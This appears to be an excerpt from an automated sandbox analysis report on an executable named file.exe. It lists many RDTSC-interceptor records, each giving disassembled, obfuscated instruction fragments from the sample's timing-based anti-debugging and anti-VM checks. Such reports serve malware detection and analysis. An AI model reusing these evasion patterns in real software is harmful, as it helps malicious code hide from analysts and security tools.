                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49EC55 second address: 49EC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F25EC6CB8ECh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FC06 second address: 49FC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov bl, 7Ah 0x0000000a sbb edi, 13F61997h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F25ED41A9E8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov di, 5422h 0x00000030 mov edi, dword ptr [ebp+122D2A01h] 0x00000036 push 00000000h 0x00000038 xor edi, dword ptr [ebp+122D351Bh] 0x0000003e xchg eax, esi 0x0000003f jc 00007F25ED41A9F0h 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0CAA second address: 4A0CBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0CBF second address: 4A0CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FEEA second address: 49FEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FEF5 second address: 49FEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0CC5 second address: 4A0CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0CC9 second address: 4A0D0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov bl, 26h 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+1245B4EEh], ebx 0x00000018 push 00000000h 0x0000001a call 00007F25ED41A9F0h 0x0000001f mov edi, 50808276h 0x00000024 pop ebx 0x00000025 cld 0x00000026 push eax 0x00000027 jo 00007F25ED41A9F8h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0D0D second address: 4A0D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1D3B second address: 4A1D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1D3F second address: 4A1D45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1D45 second address: 4A1D4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0ECD second address: 4A0ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1D4C second address: 4A1D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F25ED41A9F6h 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0ED2 second address: 4A0EDC instructions: 0x00000000 rdtsc 0x00000002 je 00007F25EC6CB8ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0EDC second address: 4A0EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007F25ED41A9E8h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2EB8 second address: 4A2EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A4CEE second address: 4A4CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A7C90 second address: 4A7C9A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F25EC6CB8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A7D3B second address: 4A7D5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c je 00007F25ED41A9E6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A4E39 second address: 4A4E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5E20 second address: 4A5E3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F25ED41A9F0h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5E3A second address: 4A5E3F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8C52 second address: 4A8C5C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F25ED41A9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8C5C second address: 4A8C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8C68 second address: 4A8C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F25ED41A9E6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8C73 second address: 4A8CDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push ecx 0x0000000b mov dword ptr [ebp+122D371Bh], esi 0x00000011 pop ebx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F25EC6CB8E8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e or di, D123h 0x00000033 or ebx, dword ptr [ebp+122D1D65h] 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+122D30AAh], esi 0x00000041 xchg eax, esi 0x00000042 pushad 0x00000043 jg 00007F25EC6CB8E8h 0x00000049 push edx 0x0000004a pop edx 0x0000004b push ebx 0x0000004c push esi 0x0000004d pop esi 0x0000004e pop ebx 0x0000004f popad 0x00000050 push eax 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6EC7 second address: 4A6F56 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F25ED41A9F7h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+124538F2h] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov bx, cx 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 sub bx, 5110h 0x0000002b mov eax, dword ptr [ebp+122D0E21h] 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F25ED41A9E8h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b jmp 00007F25ED41A9F6h 0x00000050 xor dword ptr [ebp+122D3084h], eax 0x00000056 push FFFFFFFFh 0x00000058 push eax 0x00000059 jbe 00007F25ED41A9F8h 0x0000005f push eax 0x00000060 push edx 0x00000061 jno 00007F25ED41A9E6h 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6F56 second address: 4A6F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8E2E second address: 4A8E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD2A9 second address: 4AD2AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD2AD second address: 4AD2B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC3E4 second address: 4AC3EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD531 second address: 4AD535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD535 second address: 4AD53B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B55BF second address: 4B55E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9F5h 0x00000009 jne 00007F25ED41A9E6h 0x0000000f jo 00007F25ED41A9E6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B55E9 second address: 4B55FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8EEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B58E4 second address: 4B58EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B58EA second address: 4B58F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B58F3 second address: 4B58FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F25ED41A9E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B58FE second address: 4B5910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F25EC6CB8E6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5910 second address: 4B5923 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F25ED41A9E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA9D5 second address: 4BA9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8F0h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA9EA second address: 4BA9F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F25ED41A9E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE81F second address: 4BE835 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007F25EC6CB8E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jno 00007F25EC6CB8E6h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE835 second address: 4BE847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F25ED41A9EEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE847 second address: 4BE86B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F25EC6CB8E6h 0x00000008 jmp 00007F25EC6CB8F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE86B second address: 4BE87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9EFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BF2D0 second address: 4BF2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BFA23 second address: 4BFA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F25ED41A9ECh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4538B5 second address: 4538DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F25EC6CB8EEh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 449881 second address: 44988D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F25ED41A9E6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C947B second address: 4C9489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F25EC6CB8E6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9489 second address: 4C949D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F25ED41A9E6h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C949D second address: 4C94C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F25EC6CB8F7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C94C2 second address: 4C94CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F25ED41A9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9771 second address: 4C9775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9775 second address: 4C977B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9BEF second address: 4C9BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9BF3 second address: 4C9C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F25ED41A9EFh 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9C0E second address: 4C9C4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F25EC6CB8F4h 0x0000000f pushad 0x00000010 js 00007F25EC6CB8E6h 0x00000016 jmp 00007F25EC6CB8F1h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9185 second address: 4C918A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA05D second address: 4CA061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA1DC second address: 4CA1E6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F25ED41A9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D07DD second address: 4D07E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F25EC6CB8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF246 second address: 4CF24D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF24D second address: 4CF252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF3E5 second address: 4CF3EA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF3EA second address: 4CF406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8F2h 0x00000009 pop ebx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF54A second address: 4CF554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF554 second address: 4CF56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F25EC6CB8F1h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF6E6 second address: 4CF6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF87A second address: 4CF880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFB62 second address: 4CFB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFB66 second address: 4CFB6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFCEE second address: 4CFCF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFCF6 second address: 4CFCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFE9F second address: 4CFEA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFEA5 second address: 4CFEA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFEA9 second address: 4CFECE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jp 00007F25ED41A9F2h 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0063 second address: 4D0079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F25EC6CB8ECh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B8AF second address: 47B8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F25ED41A9E6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d jc 00007F25ED41AA02h 0x00000013 jmp 00007F25ED41A9F6h 0x00000018 jo 00007F25ED41A9E6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B8DE second address: 47B8E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D065B second address: 4D0672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEE15 second address: 4CEE1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A29E second address: 49A2E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F25ED41A9E8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 lea eax, dword ptr [ebp+1248C032h] 0x0000002c add edi, 260660EAh 0x00000032 push eax 0x00000033 push esi 0x00000034 push edi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A2E7 second address: 47ADC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D17F8h], edi 0x0000000f call dword ptr [ebp+122D379Ah] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 ja 00007F25EC6CB8E6h 0x0000001e jno 00007F25EC6CB8E6h 0x00000024 pop eax 0x00000025 pushad 0x00000026 push esi 0x00000027 pop esi 0x00000028 jmp 00007F25EC6CB8F0h 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A94E second address: 49A95F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
